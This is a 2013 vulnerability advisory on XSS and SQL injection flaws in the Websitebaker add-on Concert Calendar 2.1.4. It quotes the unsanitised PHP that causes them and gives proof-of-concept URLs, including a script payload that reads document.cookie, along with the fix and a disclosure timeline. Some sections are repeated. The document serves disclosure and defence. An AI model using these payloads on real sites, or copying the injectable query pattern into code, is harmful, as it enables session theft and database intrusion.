SSCHADV2013-001 - Websitebaker Add-on 'Concert Calendar 2.1.4' XSS & SQLi vulnerability
Advisory:
|
Websitebaker Add-on ‘Concert Calendar 2.1.4’ XSS & SQLi vulnerability
|
Advisory ID:
|
SSCHADV2013-001
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on Concert Calendar 2.1.4
|
Vendor URL:
|
|
Vendor Status:
|
fixed
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
Websitebaker Add-on ‘Concert Calendar 2.1.4’ is prone to a XSS and SQLi vulnerability
======================
Vuln code
======================
// view.php
if (isset($_GET[‘date’])) {
$date = $_GET[‘date’];
}
.
.
.
// SQLi
$query_dates = mysql_query("SELECT * FROM ".TABLE_PREFIX."mod_concert_dates WHERE section_id = ‘$section_id’ && concert_date = ‘$date’"); // Zeile 184
// XSS
echo " ".switch_date($date, $dateview)." "; // Zeile 176
======================
PoC-Exploit
======================
// SQLi (magic_quotes = off)
http://[target]/wb/pages/addon.php?date=[SQLi]
// XSS
http://[target]/wb/pages/addon.php?date=‘"><script>alert(document.cookie)</script>
======================
Solution
======================
Update to the latest version Concert Calendar 2.2
Vuln code
======================
// view.php
if (isset($_GET[‘date’])) {
$date = $_GET[‘date’];
}
.
.
.
// SQLi
$query_dates = mysql_query("SELECT * FROM ".TABLE_PREFIX."mod_concert_dates WHERE section_id = ‘$section_id’ && concert_date = ‘$date’"); // Zeile 184
// XSS
echo " ".switch_date($date, $dateview)." "; // Zeile 176
======================
PoC-Exploit
======================
// SQLi (magic_quotes = off)
http://[target]/wb/pages/addon.php?date=[SQLi]
// XSS
http://[target]/wb/pages/addon.php?date=‘"><script>alert(document.cookie)</script>
======================
Solution
======================
Update to the latest version Concert Calendar 2.2
======================
Disclosure Timeline
======================
01-Jan-2013 – developer informed
08-Jan-2013 – fixed by developer
======================
Credits
======================
Vulnerabilities found and advisory written by Stefan Schurtz.
======================
References
======================
http://addons.websitebaker2.org/pages/en/browse-add-ons.php?id=0E8BC37
http://www.darksecurity.de/advisories/2013/SSCHADV2013-001.txt
Comments
Display comments as Linear | Threaded